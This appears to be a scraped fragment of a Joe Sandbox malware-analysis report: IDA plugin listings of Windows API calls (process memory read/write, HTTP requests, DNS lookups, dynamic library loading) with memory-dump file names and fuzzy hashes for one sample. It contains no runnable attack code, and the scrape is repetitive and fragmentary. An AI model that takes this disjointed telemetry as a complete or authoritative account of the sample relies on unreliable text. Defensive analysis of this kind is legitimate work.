• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
• Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
• Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
• Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 176396367-557222456
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$ClearCopyInit_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 4RH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2981388473-749298218
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                                                                                                                                                                                                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: LPT$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3035604524-2728063697
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
• Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
• Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
APIs
  • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
  • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$MemoryProcess$ReadWrite
• String ID: @
• API String ID: 4055202900-2766056989
• Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
• Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
• Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
• Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CrackInternet_memset_wcslen
• String ID: |
• API String ID: 915713708-2343686810
• Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
• Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
• Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
• Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
• HttpQueryInfoW.WININET ref: 0044A892
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
• Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
• Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
• Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
• Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
• GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Long
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 847901565-1698111956
APIs
• LoadLibraryA.KERNEL32(?), ref: 00437CB2
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
• FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
APIs
• DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
Similarity
• API ID: DestroyWindow
• String ID: msctls_updown32
• API String ID: 3375834691-2298589950
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
• SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
• MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Listbox
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2507767853-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2507767853-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
• Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
• Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
• Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
APIs
  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
• WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
• inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
• String ID: HH
• API String ID: 1515696956-2761332787
• Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
• Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
• Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
• Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetMenuItemInfoW.USER32 ref: 004497EA
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
• DrawMenuBar.USER32 ref: 00449828
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
• Opcode ID: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
• Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
• Opcode Fuzzy Hash: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
• Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: AllocTask_wcslen
• String ID: hkG
• API String ID: 2651040394-3610518997
• Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
• Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
• Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
• Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
